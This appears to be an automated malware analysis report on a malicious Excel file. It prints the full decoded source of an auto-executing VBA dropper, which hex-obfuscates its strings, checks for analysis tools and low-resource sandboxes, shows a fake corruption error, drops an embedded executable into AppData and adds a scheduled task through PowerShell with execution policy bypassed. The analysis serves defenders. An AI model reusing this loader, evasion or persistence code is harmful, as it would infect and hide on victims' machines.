Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 cdf33bdc06da43c6…

MALICIOUS

Office (OOXML) / .XLSX

428.3 KB
Created: 2026-01-09 02:09:33 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2026-06-19
MD5: 103060d9df236f80f851d4d47a627805
SHA-1: 8dfccbb32b4ce94dee2ee95b4db2ebd3aa796084
SHA-256: cdf33bdc06da43c6fb4c9fabbf515d42af8a4990c5549f29ef7aad93acc1a9bd
318 Risk Score

Heuristics 11

  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    ret = tltoiypblwfmg.Run("powershell.exe -NoProfile -ExecutionPolicy Bypass -File """ & tempPsFile & """", rktgglfckhihll, True)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set wmi = GetObject(fjcqijtguecrunm("77696e") & fjcqijtguecrunm("6d676d74733a5c5c2e5c726f6f745c63696d7632"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject(fjcqijtguecrunm("5368656c6c2e4170706c6963617469") & fjcqijtguecrunm("6f6e")) _
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set wmi = GetObject(fjcqijtguecrunm("77696e") & fjcqijtguecrunm("6d676d74733a5c5c2e5c726f6f745c63696d7632"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    eeaqtcpxkzogqtzdwo = Environ("TEMP") & "\update.log"
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 6

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 18025 bytes
SHA-256: 7df27ea9e2ef762732567ba34caec15ab91882bdd08a65cc1be6e744d055dbee
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Const uzcbzqxqhhmumu = 2
Const fcneuescivdpylq = 1
Const rktgglfckhihll = 0
Sub Auto_Open()
Dim eeaqtcpxkzogqtzdwo As String
eeaqtcpxkzogqtzdwo = Environ("TEMP") & "\update.log"
If Len(Dir(eeaqtcpxkzogqtzdwo)) > 0 Then
Call fxwlgevalafcsugxa
Exit Sub
End If
If prybyabgzifwq() Then
Call fxwlgevalafcsugxa
Else
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f74") & fjcqijtguecrunm("206265206f70656e65642e"), vbCritical
Exit Sub
End If
End Sub
Function prybyabgzifwq() As Boolean
Dim wmi As Object
Dim oymvnnmuce As Integer
Dim availableMemory As Double
Dim totalDiskSpace As Double
Dim systemDrive As String
Dim mwbjfhpamwtf As Object
Dim qzjyuryxjjmaw As Variant
qzjyuryxjjmaw = Array(fjcqijtguecrunm("6369732e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("636d6476697274682e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("616c697665") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("66696c6577617463686572") & fjcqijtguecrunm("736572766963652e657865"), fjcqijtguecrunm("6e67") & fjcqijtguecrunm("766d7376632e657865"), fjcqijtguecrunm("73616e") & fjcqijtguecrunm("64626f78696572706373732e657865"), _
fjcqijtguecrunm("616e") & fjcqijtguecrunm("616c797a65722e657865"), fjcqijtguecrunm("666f7274") & fjcqijtguecrunm("697472616365722e657865"), fjcqijtguecrunm("6e73766572") & fjcqijtguecrunm("63746c2e657865"), fjcqijtguecrunm("736269656374") & fjcqijtguecrunm("726c2e657865"), fjcqijtguecrunm("616e") & fjcqijtguecrunm("676172322e657865"), fjcqijtguecrunm("676f617463") & fjcqijtguecrunm("61737065722e657865"), _
fjcqijtguecrunm("6f6c6c796462672e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("736269657376632e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("6170696d6f6e6974") & fjcqijtguecrunm("6f722e657865"), fjcqijtguecrunm("476f6174436c69656e74417070") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("706569642e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("7363616e686f73742e65") & fjcqijtguecrunm("7865"), _
fjcqijtguecrunm("6170697370") & fjcqijtguecrunm("792e657865"), fjcqijtguecrunm("686965") & fjcqijtguecrunm("7733322e657865"), fjcqijtguecrunm("7065") & fjcqijtguecrunm("726c2e657865"), fjcqijtguecrunm("73636b746f6f6c") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("61706973707933322e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("686f6f") & fjcqijtguecrunm("6b616e616170702e657865"), fjcqijtguecrunm("7065746f") & fjcqijtguecrunm("6f6c732e657865"), _
fjcqijtguecrunm("7364") & fjcqijtguecrunm("636c742e657865"), fjcqijtguecrunm("6173") & fjcqijtguecrunm("7572612e657865"), fjcqijtguecrunm("686f6f6b657870") & fjcqijtguecrunm("6c6f7265722e657865"), fjcqijtguecrunm("706578706c6f7265") & fjcqijtguecrunm("722e657865"), fjcqijtguecrunm("7366746463") & fjcqijtguecrunm("632e657865"), fjcqijtguecrunm("617574") & fjcqijtguecrunm("6f7265706775692e657865"), fjcqijtguecrunm("687474706c6f67") & fjcqijtguecrunm("2e657865"), _
fjcqijtguecrunm("70696e67") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("73687574646f") & fjcqijtguecrunm("776e6d6f6e2e657865"), fjcqijtguecrunm("6175") & fjcqijtguecrunm("746f72756e732e657865"), fjcqijtguecrunm("6963") & fjcqijtguecrunm("6573776f72642e657865"), fjcqijtguecrunm("707230633378702e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("736e6966666869") & fjcqijtguecrunm("742e657865"), _
fjcqijtguecrunm("6175746f72756e7363") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("69636c69636b65722d72656c") & fjcqijtguecrunm("656173652e657865"), fjcqijtguecrunm("7072696e63") & fjcqijtguecrunm("652e657865"), fjcqijtguecrunm("736e6f6f702e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("6175746f73637265656e73") & fjcqijtguecrunm("686f747465722e657865"), fjcqijtguecrunm("696461") & fjcqijtguecrunm("672e657865"), _
fjcqijtguecrunm("7072") & fjcqijtguecrunm("6f63616e616c797a65722e657865"), fjcqijtguecrunm("73706b") & fjcqijtguecrunm("726d6f6e2e657865"), fjcqijtguecrunm("6176637465737473756974652e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("696461") & fjcqijtguecrunm("6736342e657865"), fjcqijtguecrunm("70726f636573736861636b") & fjcqijtguecrunm("65722e657865"), fjcqijtguecrunm("737973616e616c797a") & fjcqijtguecrunm("65722e657865"), _
fjcqijtguecrunm("61767a2e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("6964") & fjcqijtguecrunm("61712e657865"), fjcqijtguecrunm("70726f") & fjcqijtguecrunm("636573736d656d64756d702e657865"), fjcqijtguecrunm("7379736572") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("626568") & fjcqijtguecrunm("6176696f7264756d7065722e657865"), fjcqijtguecrunm("696d") & fjcqijtguecrunm("6d756e69747964656275676765722e657865"), _
fjcqijtguecrunm("70726f63") & fjcqijtguecrunm("6578702e657865"), fjcqijtguecrunm("737973") & fjcqijtguecrunm("74656d6578706c6f7265722e657865"), fjcqijtguecrunm("62696e6469") & fjcqijtguecrunm("66662e657865"), fjcqijtguecrunm("696d706f7274") & fjcqijtguecrunm("7265632e657865"), fjcqijtguecrunm("70726f6365787036342e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("73797374656d6578706c") & fjcqijtguecrunm("6f726572736572766963652e657865"), _
fjcqijtguecrunm("425450") & fjcqijtguecrunm("5472617949636f6e2e657865"), fjcqijtguecrunm("696d") & fjcqijtguecrunm("756c2e657865"), fjcqijtguecrunm("70726f636d") & fjcqijtguecrunm("6f6e2e657865"), fjcqijtguecrunm("7379") & fjcqijtguecrunm("74686f6e2e657865"), fjcqijtguecrunm("63617074757265") & fjcqijtguecrunm("6261742e657865"), fjcqijtguecrunm("496e666f63") & fjcqijtguecrunm("6c69656e742e657865"), fjcqijtguecrunm("70726f636d6f6e3634") & fjcqijtguecrunm("2e657865"), _
fjcqijtguecrunm("7461736b6d") & fjcqijtguecrunm("67722e657865"), fjcqijtguecrunm("636462") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("696e7374616c6c72697465") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("7079") & fjcqijtguecrunm("74686f6e2e657865"), fjcqijtguecrunm("7461736c6f67696e2e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("6366") & fjcqijtguecrunm("666578706c6f7265722e657865"), fjcqijtguecrunm("697066") & fjcqijtguecrunm("732e657865"), _
fjcqijtguecrunm("70797468") & fjcqijtguecrunm("6f6e772e657865"), fjcqijtguecrunm("74637064756d70") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("636c69636b73686172656c61756e63") & fjcqijtguecrunm("6865722e657865"), fjcqijtguecrunm("6970726f7365746d6f6e69746f722e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("7171") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("74637076696577") & fjcqijtguecrunm("2e657865"), _
fjcqijtguecrunm("636c") & fjcqijtguecrunm("6f7365706f7075702e657865"), fjcqijtguecrunm("69726167656e74") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("717166666f2e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("717170726f74656374") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("746f74616c636d642e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("63706f727473") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("6a6f65626f78636f6e74726f") & fjcqijtguecrunm("6c2e657865"), _
fjcqijtguecrunm("717173") & fjcqijtguecrunm("672e657865"), fjcqijtguecrunm("7472") & fjcqijtguecrunm("6f6a6469652e6b767063726f7373666972652e657865"), fjcqijtguecrunm("6a6f65626f787365") & fjcqijtguecrunm("727665722e657865"), fjcqijtguecrunm("7261") & fjcqijtguecrunm("70746f72636c69656e742e657865"), fjcqijtguecrunm("7478706c617466") & fjcqijtguecrunm("6f726d2e657865"), fjcqijtguecrunm("646e662e") & fjcqijtguecrunm("657865"), _
fjcqijtguecrunm("6c616d65722e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("7265676d6f") & fjcqijtguecrunm("6e2e657865"), fjcqijtguecrunm("76697275732e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("64736e6966") & fjcqijtguecrunm("662e657865"), fjcqijtguecrunm("4c6f674854") & fjcqijtguecrunm("54502e657865"), fjcqijtguecrunm("72656773686f742e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("76782e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("64756d706361702e65") & fjcqijtguecrunm("7865"), _
fjcqijtguecrunm("6c6f72647065") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("5265704d677236342e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("7769") & fjcqijtguecrunm("6e616c797369732e657865"), fjcqijtguecrunm("656d756c") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("6d616c6d") & fjcqijtguecrunm("6f6e2e657865"), fjcqijtguecrunm("5265705574696c7333322e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("77696e6170696f766572") & fjcqijtguecrunm("7269646533322e657865"), _
fjcqijtguecrunm("657468") & fjcqijtguecrunm("657265616c2e657865"), fjcqijtguecrunm("6d626172") & fjcqijtguecrunm("756e2e657865"), fjcqijtguecrunm("5265") & fjcqijtguecrunm("7055782e657865"), fjcqijtguecrunm("7769") & fjcqijtguecrunm("6e6462672e657865"), fjcqijtguecrunm("657474657263") & fjcqijtguecrunm("61702e657865"), fjcqijtguecrunm("6d64706d6f6e") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("72756e73616d706c65") & fjcqijtguecrunm("2e657865"), _
fjcqijtguecrunm("77696e") & fjcqijtguecrunm("64756d702e657865"), fjcqijtguecrunm("66616b656874747073") & fjcqijtguecrunm("65727665722e657865"), fjcqijtguecrunm("6d6d722e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("7361") & fjcqijtguecrunm("6d7031652e657865"), fjcqijtguecrunm("77696e7370792e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("6661") & fjcqijtguecrunm("6b657365727665722e657865"), fjcqijtguecrunm("73616d706c652e") & fjcqijtguecrunm("657865"), _
fjcqijtguecrunm("77697265736861") & fjcqijtguecrunm("726b2e657865"), fjcqijtguecrunm("6c67") & fjcqijtguecrunm("6875625f6167656e742e657865"), fjcqijtguecrunm("44656c6c4f7074696d697a65") & fjcqijtguecrunm("722e657865"), fjcqijtguecrunm("46696464") & fjcqijtguecrunm("6c65722e657865"), fjcqijtguecrunm("6d756c746970") & fjcqijtguecrunm("6f742e657865"), fjcqijtguecrunm("73616e64626f78696563") & fjcqijtguecrunm("727970746f2e657865"), fjcqijtguecrunm("5858582e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("66696c656d") & fjcqijtguecrunm("6f6e2e657865"), fjcqijtguecrunm("6e6574736e696666") & fjcqijtguecrunm("65722e657865"), _
fjcqijtguecrunm("73616e64626f78") & fjcqijtguecrunm("696564636f6d6c61756e63682e657865"))
On Error Resume Next
Set wmi = GetObject(fjcqijtguecrunm("77696e") & fjcqijtguecrunm("6d676d74733a5c5c2e5c726f6f745c63696d7632"))
systemDrive = wmi.ExecQuery(fjcqijtguecrunm("53656c6563742053797374656d44726976652066726f6d2057696e33325f4f7065726174696e") & fjcqijtguecrunm("6753797374656d")).ItemIndex(0).systemDrive
systemDrive = Left(systemDrive, uzcbzqxqhhmumu)
oymvnnmuce = wmi.ExecQuery(fjcqijtguecrunm("53656c656374204e756d6265724f664c6f676963616c50726f636573736f72732066726f6d") & fjcqijtguecrunm("2057696e33325f436f6d707574657253797374656d")).ItemIndex(0).NumberOfLogicalProcessors
If oymvnnmuce < 2 Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f7420") & fjcqijtguecrunm("6265206f70656e65642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
totalMemory = wmi.ExecQuery(fjcqijtguecrunm("53656c65637420546f74616c506879736963616c4d656d6f72792066726f6d2057696e") & fjcqijtguecrunm("33325f436f6d707574657253797374656d")).ItemIndex(0).TotalPhysicalMemory / (1024 ^ 2)
If totalMemory < 2048 Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f7420626520") & fjcqijtguecrunm("6f70656e65642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
Set mwbjfhpamwtf = wmi.ExecQuery(fjcqijtguecrunm("53656c6563742053697a652066726f6d205769") & fjcqijtguecrunm("6e33325f4c6f676963616c4469736b2077686572652044657669636549443d27") & systemDrive & fjcqijtguecrunm("27")).ItemIndex(0)
totalDiskSpace = mwbjfhpamwtf.Size / (1024 ^ 3)
If totalDiskSpace < 40 Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f742062") & fjcqijtguecrunm("65206f70656e65642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
Dim iqtqwkwi, pf, hasPagefile
hasPagefile = False
Set iqtqwkwi = wmi.ExecQuery(fjcqijtguecrunm("53656c656374202a206672") & fjcqijtguecrunm("6f6d2057696e33325f5061676546696c655573616765"))
For Each pf In iqtqwkwi
If pf.AllocatedBaseSize > 0 Then
hasPagefile = True
Exit For
End If
Next
If Not hasPagefile Then
Set iqtqwkwi = wmi.ExecQuery(fjcqijtguecrunm("53656c656374202a2066726f6d2057696e33325f5061676546696c65536574") & fjcqijtguecrunm("74696e67"))
For Each pf In iqtqwkwi
If pf.InitialSize > 0 Or pf.MaximumSize > 0 Then
hasPagefile = True
Exit For
End If
Next
End If
If Not hasPagefile Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f74206265206f70656e65") & fjcqijtguecrunm("642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
If erwujsbpnjxxngev(qzjyuryxjjmaw) Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f7420") & fjcqijtguecrunm("6265206f70656e65642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
prybyabgzifwq = True
End Function
Function erwujsbpnjxxngev(qzjyuryxjjmaw As Variant) As Boolean
Dim wmi As Object
Dim nputyvsxsfm As Object
Dim uhkggqremlmhrxfao As Object
Dim nhhfuxec As Integer
On Error Resume Next
Set wmi = GetObject(fjcqijtguecrunm("77696e6d676d74733a5c5c2e5c72") & fjcqijtguecrunm("6f6f745c63696d7632"))
Set nputyvsxsfm = wmi.ExecQuery(fjcqijtguecrunm("53656c656374202a2066726f6d2057696e33325f50726f") & fjcqijtguecrunm("63657373"))
For Each uhkggqremlmhrxfao In nputyvsxsfm
For nhhfuxec = LBound(qzjyuryxjjmaw) To UBound(qzjyuryxjjmaw)
If LCase(uhkggqremlmhrxfao.Name) = LCase(qzjyuryxjjmaw(nhhfuxec)) Then
erwujsbpnjxxngev = True
Exit Function
End If
Next nhhfuxec
Next uhkggqremlmhrxfao
erwujsbpnjxxngev = False
End Function
Sub fxwlgevalafcsugxa()
Dim nhrxmkdgxwoeqmqqnc As String
Dim pjmhbxidgkmaxgt As String
Dim ugabspcm As Object
Dim qtmcgbayej As String
Dim edobzwkbnyoi As String
Dim obgbnfap As String
Dim aeqwnanbmwej As String
Dim tpltnqekmtcxyqe As String
ActiveSheet.OLEObjects(fjcqijtguecrunm("4f626a") & fjcqijtguecrunm("6563742031")).Copy
CreateObject(fjcqijtguecrunm("5368656c6c2e4170706c6963617469") & fjcqijtguecrunm("6f6e")) _
.Namespace(ActiveWorkbook.Path) _
.Self.InvokeVerb fjcqijtguecrunm("506173") & fjcqijtguecrunm("7465")
filePath = ActiveWorkbook.Path & fjcqijtguecrunm("5c696d6167") & fjcqijtguecrunm("652e6a7067")
appDataPath = CreateObject(fjcqijtguecrunm("575363726970742e53") & fjcqijtguecrunm("68656c6c")).SpecialFolders(fjcqijtguecrunm("417070") & fjcqijtguecrunm("44617461"))
tpltnqekmtcxyqe = appDataPath & fjcqijtguecrunm("5c4d534f66") & fjcqijtguecrunm("666963655c")
If Dir(tpltnqekmtcxyqe, vbDirectory) = "" Then
MkDir tpltnqekmtcxyqe
Else
Kill filePath
Exit Sub
End If
obgbnfap = tpltnqekmtcxyqe & fjcqijtguecrunm("6d737375") & fjcqijtguecrunm("73622e657865") '
FileCopy filePath, obgbnfap
Set ugabspcm = CreateObject(fjcqijtguecrunm("5753") & fjcqijtguecrunm("63726970742e5368656c6c"))
nhrxmkdgxwoeqmqqnc = fjcqijtguecrunm("557064617465546173") & fjcqijtguecrunm("6b4d616368696e65")
aeqwnanbmwej = fjcqijtguecrunm("7374") & fjcqijtguecrunm("617274")
tempPsFile = Environ("TEMP") & "\CreateTask_" & Format(Now, "yyyymmdd_hhnnss") & "_" & Int((10000) * Rnd) & ".ps1"
psCommand = fjcqijtguecrunm("696620282d4e6f7420284765742d5363686564756c65645461736b202d5461736b4e") & fjcqijtguecrunm("616d652027") & nhrxmkdgxwoeqmqqnc & fjcqijtguecrunm("27202d4572726f72416374696f6e2053696c656e746c79436f") & fjcqijtguecrunm("6e74696e75652929207b") & vbCrLf & _
fjcqijtguecrunm("2020202024737461727454696d65203d20284765742d44") & fjcqijtguecrunm("617465292e4164644d696e75746573283239292e546f537472696e67282748483a6d6d2729") & vbCrLf & _
fjcqijtguecrunm("2020202024616374696f6e203d204e65772d5363686564756c65645461736b416374696f6e202d45786563757465") & fjcqijtguecrunm("2027") & obgbnfap & fjcqijtguecrunm("27202d417267756d656e74") & fjcqijtguecrunm("2027") & aeqwnanbmwej & fjcqijtguecrunm("27202d576f726b696e67") & fjcqijtguecrunm("4469726563746f72792027") & tpltnqekmtcxyqe & fjcqijtguecrunm("27") & vbCrLf & _
fjcqijtguecrunm("202020202474726967676572203d204e65772d5363686564756c65645461736b54726967676572202d4461696c") & fjcqijtguecrunm("79202d41742024737461727454696d65") & vbCrLf & _
fjcqijtguecrunm("2020202052656769737465722d5363686564") & fjcqijtguecrunm("756c65645461736b202d5461736b4e616d652027") & nhrxmkdgxwoeqmqqnc & fjcqijtguecrunm("27202d416374696f6e2024616374696f6e") & fjcqijtguecrunm("202d54726967676572202474726967676572202d466f726365") & vbCrLf & _
fjcqijtguecrunm("7d")
Dim irunxnvgqdvx As Object, rowahtvsmgbfkhe As Object
Set irunxnvgqdvx = CreateObject(fjcqijtguecrunm("536372697074696e672e") & fjcqijtguecrunm("46696c6553797374656d4f626a656374"))
Set rowahtvsmgbfkhe = irunxnvgqdvx.CreateTextFile(tempPsFile, True, True)
rowahtvsmgbfkhe.Write psCommand
rowahtvsmgbfkhe.Close
Set tltoiypblwfmg = CreateObject(fjcqijtguecrunm("575363726970742e5368") & fjcqijtguecrunm("656c6c"))
ret = tltoiypblwfmg.Run("powershell.exe -NoProfile -ExecutionPolicy Bypass -File """ & tempPsFile & """", rktgglfckhihll, True)
On Error Resume Next
irunxnvgqdvx.DeleteFile tempPsFile, True
On Error GoTo 0
Kill filePath
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e") & fjcqijtguecrunm("6e6f74206265206f70656e65642e2e2e"), vbCritical
End Sub

Attribute VB_Name = "Module2"
Function fjcqijtguecrunm(ByVal rtkhffdrz As String) As String
Dim hdwzvgtoxf As Long
For hdwzvgtoxf = 1 To Len(rtkhffdrz) Step 2
fjcqijtguecrunm = fjcqijtguecrunm & Chr$(Val("&H" & Mid$(rtkhffdrz, hdwzvgtoxf, 2)))
Next hdwzvgtoxf
End Function
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject1.bin 712192 bytes
SHA-256: 70157f517e8e7622f49eb112d8d4a10f08dac3a15857c3d92ac07a49bf869d89
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.52, consistent with packed or encrypted content.
ooxml_oleobject_00_ole10native_00.bin ole-package OOXML xl/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 705064 bytes
SHA-256: c4b54097f7a1ccb0a4e4a10497431b8d938a7ac0e030b18cf258cb2eb3c8adb6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.55, consistent with packed or encrypted content.
ooxml_oleobject_00_ole10native_00_image.jpg ole-package-payload OOXML xl/embeddings/oleObject1.bin Ole10Native payload: display_name=image.jpg; full_path=C:\Users\Admin\AppData\Local\Temp\{E4D8AFD4-B54C-448A-88EA-2CF8749DA8C9}\image.jpg; temp_path=; def_file= 704512 bytes
SHA-256: f2977b1f3f05c3e38d301232dccf059ba3bb6b126d1f892d7a338c3f9fcaa49e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.55, consistent with packed or encrypted content.
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 38400 bytes
SHA-256: 67063b951eca0481a6118f835ed6189b6d2062d46dcdae8cf0c6fe41703e7ef4
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 4988 bytes
SHA-256: 47b36d4917a574120d2728674abc24e9796871c1fc19eca067ce81eca3058888